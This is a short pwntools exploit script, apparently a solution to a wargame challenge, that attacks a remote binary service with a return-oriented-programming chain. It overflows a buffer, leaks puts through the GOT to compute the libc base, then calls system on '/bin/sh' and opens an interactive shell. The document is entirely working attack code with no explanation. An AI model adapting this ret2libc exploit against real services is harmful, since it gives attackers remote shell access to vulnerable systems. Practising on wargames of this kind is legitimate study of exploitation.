Rop
from pwn import *
s = remote("wargame.kimtae.xyz",10018)
lib = ELF('./rop.so')
dummy = "A"*40
p_rdi = 0x00400793
puts_plt = 0x0000000000400520
puts_got = 0x0000000000601018
vulner_addr = 0x40067F
payload = dummy
payload += p64(p_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(vulner_addr)
s.sendline(payload)
s.recvuntil("Hello, Stranger!~~~~\n")
s.recvuntil("\n")
libc_puts = u64(s.recvuntil("\n")[:-1] +"\x00\x00")
libc_base = libc_puts - lib.symbols['puts']
bin_system = libc_base + lib.symbols['system']
bin_binsh = libc_base + 0x18C58B
payload2 = dummy
payload2 += p64(p_rdi)
payload2 += p64(bin_binsh)
payload2 += p64(bin_system)
s.sendline(payload2)
s.interactive()
